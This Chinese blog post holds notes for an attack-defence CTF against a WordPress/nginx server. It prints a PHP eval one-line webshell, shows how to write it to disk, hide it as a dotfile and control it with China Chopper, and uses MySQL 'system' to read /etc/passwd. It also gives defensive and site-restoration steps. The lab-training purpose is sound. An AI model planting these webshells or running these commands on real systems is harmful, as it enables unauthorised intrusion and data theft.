混战

作者: xuanxi | 来源:发表于2017-11-25 23:14 被阅读0次

netdiscover -r 10.0.0.0/24

登录后台一般关键字是admin或者login

一、把整个网站 www文件打包下来

[root@nginx php-5.6.30]# find / -name www

/application/nginx/html/www/【显示这个】

[root@nginx php-5.6.30]#cd /application/nginx/html/www/【进到目录下面】

[root@nginx www]#tar cf 1.gz ./#【打包成1.gz】

[root@nginx www]#ls【查看到当前目录文件】

【有显示1.gz】

二、通过url把文件down下来

在网址比如10.0.0.118后面加/1.gz-------->10.0.0.118/1.gz

三、把1.gz在本地解压下来

找到wp-config.php配置文件--->用notepad++打开--->看到mysql数据库密码为123456

四、改mysql的密码和配置文件mysql的密码

1、改mysql密码

[root@nginx www]#mysqladmin -uroot password -p123456

new password:123

confirm new password:123

2、改配置文件mysql的密码

[root@nginx www]#vim wp-config.php

password后面‘’里面123456改成123

五、查找危险操作(eval)

查找---->输入eval---->目录为(由wp-admin/wp-content/wp-includes的文件夹)----->全部查找

忽略掉在/**/、*里和不是单独的eval的

六、一句话木马

<?php eval($_POST[abc]);?>

[root@nginx www]#echo "<?php eval($_POST[abc]);?>" > 1.php【在当前目录下把这一句木马保存为1.php】

[root@nginx www]#ls【会看到当前目录下有1.php】

七、用网页打开1.php

10.0.0.118/1.php

界面空白没报错,说明木马执行成功

八、中国菜刀连接一句话木马

地址输入:http://10.0.0.118/1.php  -->后面框:abc--->添加

可以看到网站所有目录,一般flag存在www下面

九、waf包含进

require_once( dirname(_FILE_),'/wp-load.php');

一、打开日志文件分析日志

[root@nginx www]#cd ..【返回上一级】

[root@nginx html]#ls

[root@nginx html]#cd ..

[有显示log]

[root@nginx nginx]#ls logs/【打开logs】

[显示access.log error.log nginx.pid]

[root@nginx nginx]#tail logs/access.log -t【分析别人的日志,然后可以照着学】

对方有www下面一句话木马,关键是要找到!!

一、时刻监控自己的端口有没有多出来的【对方是用msf加进来的端口】

[root@nginx nginx]#ss -ano

如果有多出来,就kill pid

[root@nginx nginx]#ps -ef | grep 80

第一列数字就是pid

直接 kill pid即可阻止别人通过msf获取到自己本机的flag【flag一般在根目录下,很好找,只有读权限】

一、隐藏木马显示并利用

[root@nginx nginx]#cd ~

[root@nginx ~]#ls

[root@nginx ~]#ls -a【比上面的多出很多前面带.的隐藏文件】

(下面有.access.log)

[root@nginx ~]#cat .access.log【可以找到里面的一句话木马,然后利用】

二、利用隐藏文件里面的木马,并用中国菜刀利用

[root@nginx ~]#cd /application/nginx/html/www/

[root@nginx www]#ls 

[root@nginx www]#mv 1.php .1.php【把1.php改为.1.php】

[root@nginx www]#ls -a【可看到.1.php】

浏览器---->10.0.0.118/.1.php--->中国菜刀

三、高级木马

四、超级木马

五、变种木马

六、让木马永远活跃

把下面代码放在网站的根目录下面 www下面(上传),一般拿到了后台就可以直接上传

七、日志记录

不小心把网站毁了,修复流程【在修改别人网站之前,把网站下所有文件打包成1.gz,为了可以修复】

一、

[root@nginx html]#mv 1.gz www/【把1.gz移到www目录下】

[root@nginx html]#cd www

[root@nginx www]#ls

(显示1.gz)

[root@nginx www]#tar xf 1.gz【解压1.gz】

[root@nginx www]#ls

(有wp-config.php文件)

[root@nginx www]#mv wp-config.php ..【将这个文件保存在上级】

[root@nginx www]#rm -rf *【清空缓存】

[root@nginx www]#ls【什么都没有 清空成功】

[root@nginx www]#cd ..【返回上级目录】

[root@nginx html]#rm -rf wordpress【干掉wordpress】

[root@nginx html]#ls

(有wordpress-4.8.1-zh_CN.tar.gz)

[root@nginx html]#tar zxvf wordpress-4.8.1-zh_CN.tar.gz

[root@nginx html]#ls【会生成一个wordpress目录】

[root@nginx html]#cd wordpress

[root@nginx wordpress]#ls

发现没有配置文件

[root@nginx wordpress]#mv ../wp-config.php.【把上上级的配置文件移到当前目录下来】

[root@nginx wordpress]#ls【发现有这个配置文件】

[root@nginx wordpress]#mv * ../www/【移到www目录下面】

[root@nginx wordpress]#ls ../www/【发现有这个配置文件】

查看浏览器  提示数据库连接错误,还要重新配置一下

[root@nginx wordpress]#cd ../www/

[root@nginx www]#ls

[root@nginx www]#vim wp-config.php

[root@nginx www]#mysqladmin -uroot password -p123

新密码:123456

重复新密码:123456

再刷新网页,成功修复

l连接mysql

[root@nginx www]#mysql -uroot -p123456【登录mysql】

mysql>system ifconfig【提权】

mysql>system cat /etc/passwd

mysql>system +后面kail命令行

相关文章

  • 混战

    netdiscover -r 10.0.0.0/24 登录后台一般关键字是admin或者login 一、把整个网站...

  • 混战

    相互屠杀很快变成了大平原的混战。人们根本来不及思考,就不得不加入某一个所谓拥有神的护佑的更大的部落。 大平原的部落...

  • 混战

    今天下午发生了一起故意伤人事件,嫌犯李波东李某因拘捕而被家长带回家改造。 现在,让我们一起...

  • 混战

    一个学期过得飞快,好像才刚刚开学,又到了寒假。我庆幸自己终于跑出家门,不用再与三只神兽纠缠。可晚上,总还得回家欢聚...

  • 混战

    二世皇帝下二年(癸巳,公元前二零八年) 章邯已破陈王,乃进兵击魏王于临济。魏王使周市出,请救于齐、楚。齐王儋及楚将...

  • “混战”

    今天一天如同打“混战”,七点就到办公室,准备今天政府专项推进会,又约上总承租人徐老板和部分商户代表沟通,家...

  • 第四十五章 蒂亚瓦纳科城(上)

    经过这场混战……

  • 异次元混战

    很久以前,奥特曼和怪兽大战之后,宇宙出现了裂缝,而奥特曼所在的M78行云被宇宙裂缝吸了进去。

  • 2020.12.11 混战

    一大早家里鸡飞狗跳哟,理念不合真没法子。 惹不起,就躲,都躲。冷漠谁不会呀……

  • 混战,喊停

    文 / 图:许大果 没有轰然爆炸的一声巨响,没有剧烈的地动山摇,没有来势汹汹的惊涛骇浪,窗外如此平静,苍穹一片碧蓝...

网友评论

      本文标题:混战

      本文链接:https://www.haomeiwen.com/subject/ikqhbxtx.html